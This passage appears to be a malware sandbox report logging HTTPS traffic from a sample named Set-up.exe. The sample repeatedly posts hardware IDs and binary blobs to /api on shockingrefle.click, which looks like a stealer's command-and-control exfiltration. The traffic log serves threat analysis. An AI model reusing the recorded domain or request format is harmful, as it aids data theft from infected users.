                                                                                                                                                                                              2025-01-05 17:08:22 UTC1369INData Raw: 31 64 63 30 0d 0a 38 56 43 41 43 2f 52 4a 4c 76 7a 62 7a 7a 66 36 6a 7a 2f 34 6e 56 62 76 6f 38 44 4a 53 78 35 4d 56 59 33 59 4e 79 5a 56 55 38 76 68 59 63 55 47 73 78 38 67 35 49 62 42 4c 39 47 50 4c 2f 6a 6c 47 37 32 70 68 70 49 64 4b 41 68 6c 76 66 45 6d 4d 52 31 36 33 4b 56 4b 79 51 4c 32 63 57 57 77 6a 73 45 35 71 4d 6b 6e 34 49 6f 62 76 62 58 58 69 67 56 4e 57 54 44 6d 70 57 64 77 41 6b 75 56 75 67 2f 59 55 75 77 4e 49 4f 53 62 77 53 2b 6f 69 47 53 71 79 46 50 2b 70 38 57 4e 59 79 4d 49 66 62 37 35 4f 79 46 75 61 76 57 75 54 73 30 63 39 6d 35 34 71 5a 6d 43 63 75 2f 78 57 62 62 64 51 66 71 2f 77 4d 6f 64 55 30 74 6b 38 36 34 4a 59 42 67 55 35 4f 30 50 31 6c 4c 73 48 31 75 6e 68 34 39 77 2f 74 34 71 6d 38 78 59 38 72 72 48 69 68 4e 64 44 53 76 72 70
                                                                                                                                                                                              Data Ascii: 1dc08VCAC/RJLvzbzzf6jz/4nVbvo8DJSx5MVY3YNyZVU8vhYcUGsx8g5IbBL9GPL/jlG72phpIdKAhlvfEmMR163KVKyQL2cWWwjsE5qMkn4IobvbXXigVNWTDmpWdwAkuVug/YUuwNIOSbwS+oiGSqyFP+p8WNYyMIfb75OyFuavWuTs0c9m54qZmCcu/xWbbdQfq/wModU0tk864JYBgU5O0P1lLsH1unh49w/t4qm8xY8rrHihNdDSvrp
                                                                                                                                                                                              2025-01-05 17:08:22 UTC1369INData Raw: 43 32 4f 52 78 38 44 57 36 57 47 2b 79 6d 59 78 37 79 63 78 32 73 75 52 72 36 4c 4c 49 78 46 6f 4c 47 69 76 39 74 6a 39 67 43 47 32 62 36 77 2f 78 58 50 52 48 4c 76 7a 4a 74 48 54 6d 77 57 43 75 79 78 6a 61 76 38 48 4c 53 77 30 47 5a 35 4c 31 49 53 6f 51 47 70 75 6c 44 35 5a 41 2b 68 39 71 74 63 6e 5a 4a 37 71 55 4d 75 75 4e 42 61 2b 75 69 4e 4d 64 43 30 73 7a 34 62 68 77 4d 68 41 4d 6d 2b 52 4d 33 41 43 79 58 48 69 6e 7a 72 39 4a 7a 64 68 6b 71 4e 78 57 77 34 2f 74 78 6c 73 61 45 57 79 31 30 42 42 67 48 68 54 55 34 78 66 33 55 76 77 66 55 65 72 4a 6d 54 65 77 6a 31 4b 37 31 46 76 36 70 39 65 48 65 41 6f 49 65 37 58 31 63 47 34 51 55 70 76 37 48 34 42 53 73 45 34 75 2f 4e 6e 54 4c 4c 32 63 4d 4f 69 49 53 72 4f 6f 68 74 77 64 52 56 6b 6c 38 2b 52 77 65 42
                                                                                                                                                                                              Data Ascii: C2ORx8DW6WG+ymYx7ycx2suRr6LLIxFoLGiv9tj9gCG2b6w/xXPRHLvzJtHTmwWCuyxjav8HLSw0GZ5L1ISoQGpulD5ZA+h9qtcnZJ7qUMuuNBa+uiNMdC0sz4bhwMhAMm+RM3ACyXHinzr9JzdhkqNxWw4/txlsaEWy10BBgHhTU4xf3UvwfUerJmTewj1K71Fv6p9eHeAoIe7X1cG4QUpv7H4BSsE4u/NnTLL2cMOiISrOohtwdRVkl8+RweB


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              2192.168.2.449751104.21.21.634437160C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-05 17:08:23 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=1N21OVTW
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 18101
                                                                                                                                                                                              Host: shockingrefle.click
                                                                                                                                                                                              2025-01-05 17:08:23 UTC15331OUTData Raw: 2d 2d 31 4e 32 31 4f 56 54 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 31 39 31 46 33 45 31 43 43 32 34 41 35 35 30 45 45 43 42 43 45 44 34 30 38 42 39 31 41 43 0d 0a 2d 2d 31 4e 32 31 4f 56 54 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 4e 32 31 4f 56 54 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 31 4e 32 31 4f 56 54 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f
                                                                                                                                                                                              Data Ascii: --1N21OVTWContent-Disposition: form-data; name="hwid"E2191F3E1CC24A550EECBCED408B91AC--1N21OVTWContent-Disposition: form-data; name="pid"2--1N21OVTWContent-Disposition: form-data; name="lid"hRjzG3--DNO--1N21OVTWContent-Dispositio
                                                                                                                                                                                              2025-01-05 17:08:23 UTC2770OUTData Raw: 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b 91 d7 e9 19 4d f6
                                                                                                                                                                                              Data Ascii: 3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{M
                                                                                                                                                                                              2025-01-05 17:08:24 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 05 Jan 2025 17:08:24 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=o6i52p8tlsou7l5n7k3g7n4536; expires=Thu, 01 May 2025 10:55:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XcvWN0ZVNGnEG0iAyLiMtV%2F7eCGyKhO6FePt%2FyxSHv2hmEcPGIRKmo3whXWzmYd%2BspdM%2B8Rdl7nJWQl2k4fxP9vUgLorKf%2BhlK520TLfVT8qZi3vxtwkxbUctLp%2BbcYoZ2Psn70C"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8fd511ef9d930c94-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1623&rtt_var=622&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2849&recv_bytes=19056&delivery_rate=1740166&cwnd=146&unsent_bytes=0&cid=39b390b15125b75e&ts=665&x=0"
                                                                                                                                                                                              2025-01-05 17:08:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                              2025-01-05 17:08:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              3192.168.2.449752104.21.21.634437160C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-05 17:08:24 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=2I9FGWDOJKI
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 8740
                                                                                                                                                                                              Host: shockingrefle.click
                                                                                                                                                                                              2025-01-05 17:08:24 UTC8740OUTData Raw: 2d 2d 32 49 39 46 47 57 44 4f 4a 4b 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 31 39 31 46 33 45 31 43 43 32 34 41 35 35 30 45 45 43 42 43 45 44 34 30 38 42 39 31 41 43 0d 0a 2d 2d 32 49 39 46 47 57 44 4f 4a 4b 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 49 39 46 47 57 44 4f 4a 4b 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 32 49 39 46 47 57 44 4f 4a 4b 49 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                                              Data Ascii: --2I9FGWDOJKIContent-Disposition: form-data; name="hwid"E2191F3E1CC24A550EECBCED408B91AC--2I9FGWDOJKIContent-Disposition: form-data; name="pid"2--2I9FGWDOJKIContent-Disposition: form-data; name="lid"hRjzG3--DNO--2I9FGWDOJKIConten
                                                                                                                                                                                              2025-01-05 17:08:25 UTC1137INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 05 Jan 2025 17:08:25 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=l7u00ovvhk5944havf75cshggs; expires=Thu, 01 May 2025 10:55:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FmYy%2FVLZ1miYcZdw03nQz9uBAldNnrJB%2F%2Bsor62srYmNivA8XCoxQ1uOyoFNCPJLpSJiwq6uI%2F%2Bjat0Bu3VV%2Blmw3zTzdIot9qOBvKI%2B8%2BpEQ9DCfmXKiULuJsu1VKf3mHt6C124"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8fd511f73a33431a-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1632&rtt_var=622&sent=5&recv=13&lost=0&retrans=0&sent_bytes=2847&recv_bytes=9675&delivery_rate=1743283&cwnd=224&unsent_bytes=0&cid=a03ec90c8d317769&ts=484&x=0"
                                                                                                                                                                                              2025-01-05 17:08:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                              2025-01-05 17:08:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              4192.168.2.449753104.21.21.634437160C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-05 17:08:25 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=EXPKA5AGLKN3XAIZA9
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 20435
                                                                                                                                                                                              Host: shockingrefle.click
                                                                                                                                                                                              2025-01-05 17:08:25 UTC15331OUTData Raw: 2d 2d 45 58 50 4b 41 35 41 47 4c 4b 4e 33 58 41 49 5a 41 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 31 39 31 46 33 45 31 43 43 32 34 41 35 35 30 45 45 43 42 43 45 44 34 30 38 42 39 31 41 43 0d 0a 2d 2d 45 58 50 4b 41 35 41 47 4c 4b 4e 33 58 41 49 5a 41 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 58 50 4b 41 35 41 47 4c 4b 4e 33 58 41 49 5a 41 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a
                                                                                                                                                                                              Data Ascii: --EXPKA5AGLKN3XAIZA9Content-Disposition: form-data; name="hwid"E2191F3E1CC24A550EECBCED408B91AC--EXPKA5AGLKN3XAIZA9Content-Disposition: form-data; name="pid"3--EXPKA5AGLKN3XAIZA9Content-Disposition: form-data; name="lid"hRjzG3--DNO
                                                                                                                                                                                              2025-01-05 17:08:25 UTC5104OUTData Raw: 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00
                                                                                                                                                                                              Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                                                                              2025-01-05 17:08:26 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 05 Jan 2025 17:08:26 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=trusib9qeefq0ke3fehtnr0out; expires=Thu, 01 May 2025 10:55:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=avwM4TqYvcYHv36yDT%2F2GCrGHaDRK0tNN33P%2BtYMW36qwzek%2BMxLWW9RWdQ6FyASqZH6y7lzi13UXOUecNDgVY3iPraHc%2FLJVoGYX4oRVXjVOucHUbVx8QAqcE5F5fdBDBHZ%2BD6d"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8fd511fe2fdc5e6e-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1579&rtt_var=604&sent=12&recv=27&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21400&delivery_rate=1795817&cwnd=235&unsent_bytes=0&cid=aa06ba0ba66592ed&ts=616&x=0"
                                                                                                                                                                                              2025-01-05 17:08:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                              2025-01-05 17:08:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              5192.168.2.449754104.21.21.634437160C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-05 17:08:27 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=273BKNM4F5SFW
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 1227
                                                                                                                                                                                              Host: shockingrefle.click
                                                                                                                                                                                              2025-01-05 17:08:27 UTC1227OUTData Raw: 2d 2d 32 37 33 42 4b 4e 4d 34 46 35 53 46 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 31 39 31 46 33 45 31 43 43 32 34 41 35 35 30 45 45 43 42 43 45 44 34 30 38 42 39 31 41 43 0d 0a 2d 2d 32 37 33 42 4b 4e 4d 34 46 35 53 46 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 37 33 42 4b 4e 4d 34 46 35 53 46 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 32 37 33 42 4b 4e 4d 34 46 35 53 46 57
                                                                                                                                                                                              Data Ascii: --273BKNM4F5SFWContent-Disposition: form-data; name="hwid"E2191F3E1CC24A550EECBCED408B91AC--273BKNM4F5SFWContent-Disposition: form-data; name="pid"1--273BKNM4F5SFWContent-Disposition: form-data; name="lid"hRjzG3--DNO--273BKNM4F5SFW
                                                                                                                                                                                              2025-01-05 17:08:28 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 05 Jan 2025 17:08:27 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=t68dbgs9vcq7is8pgeu2v5ps1h; expires=Thu, 01 May 2025 10:55:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PRJueFk3J8nMHCzKwGoOe2wvhGThNaawXkENjCE%2BzediKH3dcW5hi8ZsDX6vC2IbqlROtpRW%2F%2BpJ1zFy0v8qZxU3mhGBEOHUbvaHod2dXK650k8wsA%2B3SZ0Ual9QlHPXQQ%2FrUJ80"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8fd512077f7e0c8e-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1704&rtt_var=663&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2142&delivery_rate=1619523&cwnd=181&unsent_bytes=0&cid=36e21c8455238ec6&ts=444&x=0"
                                                                                                                                                                                              2025-01-05 17:08:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                              2025-01-05 17:08:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              6192.168.2.449755104.21.21.634437160C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-05 17:08:28 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=0M5WO8B7JQXFWSWP6E2
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 1108
                                                                                                                                                                                              Host: shockingrefle.click
                                                                                                                                                                                              2025-01-05 17:08:28 UTC1108OUTData Raw: 2d 2d 30 4d 35 57 4f 38 42 37 4a 51 58 46 57 53 57 50 36 45 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 31 39 31 46 33 45 31 43 43 32 34 41 35 35 30 45 45 43 42 43 45 44 34 30 38 42 39 31 41 43 0d 0a 2d 2d 30 4d 35 57 4f 38 42 37 4a 51 58 46 57 53 57 50 36 45 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 4d 35 57 4f 38 42 37 4a 51 58 46 57 53 57 50 36 45 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e
                                                                                                                                                                                              Data Ascii: --0M5WO8B7JQXFWSWP6E2Content-Disposition: form-data; name="hwid"E2191F3E1CC24A550EECBCED408B91AC--0M5WO8B7JQXFWSWP6E2Content-Disposition: form-data; name="pid"1--0M5WO8B7JQXFWSWP6E2Content-Disposition: form-data; name="lid"hRjzG3--DN
                                                                                                                                                                                              2025-01-05 17:08:29 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 05 Jan 2025 17:08:29 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=72r3jebmduptcenmv0njkom7rj; expires=Thu, 01 May 2025 10:55:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0FxX1E%2BcC%2B91c%2BttXi5q%2FLnGImU3JMzEtklg5FaJ4HjL%2BtQ2quFZ3wl70Gj%2Fd4OGCdo6ryZvhuW19vx8yJcHtFo8RsKvfu7gOuf5i0rxmdX5jffPEQisF6ItmORlMPqt2J6bjdjj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8fd5120f2b0c42f2-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1734&min_rtt=1728&rtt_var=660&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=2029&delivery_rate=1642294&cwnd=222&unsent_bytes=0&cid=0ba90a9c1f2eece7&ts=912&x=0"
                                                                                                                                                                                              2025-01-05 17:08:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                              2025-01-05 17:08:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              7192.168.2.449756104.21.21.634437160C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
